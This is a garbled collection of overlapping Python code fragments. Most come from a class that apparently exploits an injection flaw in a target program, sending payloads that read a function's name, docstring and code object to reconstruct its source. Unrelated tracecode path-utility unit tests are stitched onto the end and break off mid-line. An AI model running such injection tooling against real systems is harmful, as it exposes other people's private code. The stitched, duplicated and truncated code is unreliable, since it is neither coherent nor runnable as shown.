FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection", "0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker", ".name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module", "via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker):", "names could not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__(", "from inspect import ( signature as inspect_signature) from types import ( CodeType, FunctionType)", "function. This module will attempt to recover the source code from a function,", "got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring( self", "return yield from walker.walk() self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]:", "None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str]", "This module will attempt to recover the source code from a function, via", "line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code", "name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable", "= f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to", "self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] =", "to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self ) ->", "self._signature: Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code", "_walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r'", "try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError:", ".+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None", "= None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code:", "' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg(", "yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__}", "attempt to recover the source code from a function, via access to its", "call to ``walk()`` cannot recover the object, then this attribute will remain as", "CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker)", "when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker", "walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get", "walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string", "yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection ' f'{doc_string_injection}') return", "walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in src_lines]", "a function. This module will attempt to recover the source code from a", "-> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property def", "after a call to :func:`walk`. If the call to ``walk()`` cannot recover the", "f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring(", "import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker)", "for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value:", "the source code from a function, via access to its ``__code__`` attribute. \"\"\"", ") -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result =", "is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection '", "FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from", "yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__}", "name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from", "doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable", "to read __doc__ of function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection,", "object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return", "self ) -> Optional[str]: \"\"\"The source code that this walker recovered from the", "self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result =", "yield FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}') return walker", ".failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker", "self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection", "walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines)", "None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response ' f'{raw_result}') return", "``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def", "raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection", "' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def", "if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully", "-> str: \"\"\"Get a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\"", "\"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result", "FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt to recover the", "f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read", "signature, if one was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]:", "{type(walker)} when injecting function __code__ ' 'attribute; something is terribly wrong...') return for", "None self._signature: Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The", "if result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via", "( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from", "of the FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from types", "recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) ->", "decompiled function's signature, if one was retrieved.\"\"\" return self._signature def walk( self )", "instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring( self ) ->", "self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker)", "None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object", "( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker)", "code that this walker recovered from the target.\"\"\" return self._src_code @property def signature(", ") -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker", "a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield", "attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg(", "\"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self", "def src_code( self ) -> Optional[str]: \"\"\"The source code that this walker recovered", "= f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self", "self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return", "Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker", "= self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker", "\"\"\"Injection walker for a function. This module will attempt to recover the source", "__extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\", "from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None else", "code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature from a code", "= self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found", "= inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return", "def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function object", "code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from", "code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable", "@property def src_code( self ) -> Optional[str]: \"\"\"The source code that this walker", "not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} '", "this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker", "-> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from the target. This", "was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name()", "def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature from a", "\"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code(", "walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection", "the target. This attribute will only be populated after a call to :func:`walk`.", "FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is terribly wrong...')", ") -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker:", "( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt", "See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def", "recovered from the target.\"\"\" return self._src_code @property def signature( self ) -> Optional[str]:", "this walker recovered from the target. This attribute will only be populated after", ":func:`walk`. If the call to ``walk()`` cannot recover the object, then this attribute", "the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is", "Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if", "NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None", "exact argument names could not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\"", "injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield", "function's signature, if one was retrieved.\"\"\" return self._signature def walk( self ) ->", "not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute;", "indented_src_lines = [f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code", "f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected", "FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection ' f'{name_injection}') return walker", "to recover the source code from a function, via access to its ``__code__``", "attribute will remain as ``None``. \"\"\" return self._code_walker @property def name_walker( self )", "return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code", "yield from walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) ->", "= \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature:", "in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code +=", "code object that this walker recovered from the target. This attribute will only", "yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None:", "r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] =", "yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string ' f'{walker.injection_str}') return", "yield from walker.walk() self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover", "from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import", "self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if", "is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in src_lines] self._signature", "return yield from walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType )", "via access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function", "is terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is", "def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\"", "from the target. This attribute will only be populated after a call to", "FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our", "@property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to recover this function's", "\"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result", "return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__", "None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker =", "= None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) ->", "{code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return f\"\"\"\\ # exact argument", "injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield", "FailedInjectionWalker.msg( 'No matching walker found for injection response ' f'{raw_result}') return elif not", "object that this walker recovered from the target. This attribute will only be", "of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not", "from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This", "import ( signature as inspect_signature) from types import ( CodeType, FunctionType) from typing", "source code from a function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE", "self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is", "signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {})", "None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None:", "code from a function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE =", "will only be populated after a call to :func:`walk`. If the call to", "or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from", "got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature(", "FailedInjectionWalker.msg( 'Unable to successfully recover code object from string ' f'{walker.injection_str}') return src_lines", "return self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover", "-> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker", "for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is", "inspect_signature) from types import ( CodeType, FunctionType) from typing import ( Iterator, Optional)", "__doc__ of function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if", "result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__", "self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from the", "object, then this attribute will remain as ``None``. \"\"\" return self._code_walker @property def", "self ) -> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker", "'Unable to read __doc__ of function via injection ' f'{doc_string_injection}') return walker =", "except TypeError: # build our own signature return f\"\"\"\\ # exact argument names", "( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class", "self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the", "the target.\"\"\" return self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The decompiled", "' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines", "from walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str:", "matching walker found for injection response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker):", "result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending", "__name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield", "FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}') return walker =", "attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__(", "__name__.\"\"\" return self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to", "else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature(", "code object from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is", "function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used", "+= '\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's", "-> Optional[str]: \"\"\"The source code that this walker recovered from the target.\"\"\" return", "def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection =", "= \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def", "if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection}", "walker.walk() self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's", "= self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response", "f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return f\"\"\"\\ # exact", "is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response ' f'{raw_result}')", "a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence =", "src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f'", "return f\"\"\"\\ # exact argument names could not be reversed for below signature", "typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import", "attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg(", "@property def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature, if one", "the object, then this attribute will remain as ``None``. \"\"\" return self._code_walker @property", "recover the object, then this attribute will remain as ``None``. \"\"\" return self._code_walker", "@property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker", "that this walker recovered from the target. This attribute will only be populated" ]
[ "def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test def test_common_path_prefix11(self):", "test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def", "a free and open source software analysis tool from nexB Inc. and others.", "by applicable law or agreed to in writing, software distributed # under the", "The TraceCode software is licensed under the Apache License version 2.0. # Data", "pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/')", "def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test def test_common_path_prefix18(self):", "== test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test", "== test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0) == test", "test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def test_common_path_prefix20(self): test", "test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test def test_common_path_prefix18(self): test =", "test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test =", "test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test", "('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0)", "'/') assert (None, 0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert", "'/') assert (None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert", "assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c',", "__future__ import unicode_literals import unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self):", "assert ('a', 1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a',", "distributed # under the License is distributed on an \"AS IS\" BASIS, WITHOUT", "test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test", "BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied.", "def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self):", "test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test def", "free and open source software analysis tool from nexB Inc. and others. #", "= pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/',", "= pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c',", "TraceCode should be considered or used as legal advice. Consult an Attorney #", "# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless", "test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test def test_common_path_prefix18(self): test", "No content created from # TraceCode should be considered or used as legal", "test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test", "test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test", "assert ('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a',", "download. # from __future__ import absolute_import from __future__ import division from __future__ import", "assert (None, 0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None,", "test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test =", "test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def", "test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment is ignored test =", "WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the", "WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See", "nexB Inc. # # You may not use this software except in compliance", "test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None, 0) == test def", "for the # specific language governing permissions and limitations under the License. #", "test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def", "'') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('', '') assert", "def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self):", "= pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b',", "== test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment is", "Copyright (c) nexB Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/", "== test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None, 0) == test", "# under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "'a/b') assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert", "assert ('a', 1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a',", "implied. See the License for the # specific language governing permissions and limitations", "# # Copyright (c) nexB Inc. and others. All rights reserved. # http://nexb.com", "When you publish or redistribute any data created with TraceCode or any TraceCode", "Attorney # for any legal advice. # TraceCode is a free and open", "data with the following acknowledgment: # # Generated with TraceCode and provided on", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either", "following acknowledgment: # # Generated with TraceCode and provided on an \"AS IS\"", "acknowledgment: # # Generated with TraceCode and provided on an \"AS IS\" BASIS,", "language governing permissions and limitations under the License. # # When you publish", "others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is", "http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under the Apache License", "test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test", "an acknowledgment. # TraceCode is a trademark of nexB Inc. # # You", "test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test =", "1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) ==", "use this software except in compliance with the License. # You may obtain", "from __future__ import unicode_literals import unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def", "== test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test", "copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or", "= pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/',", "test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test =", "test = pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self): test =", "def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', 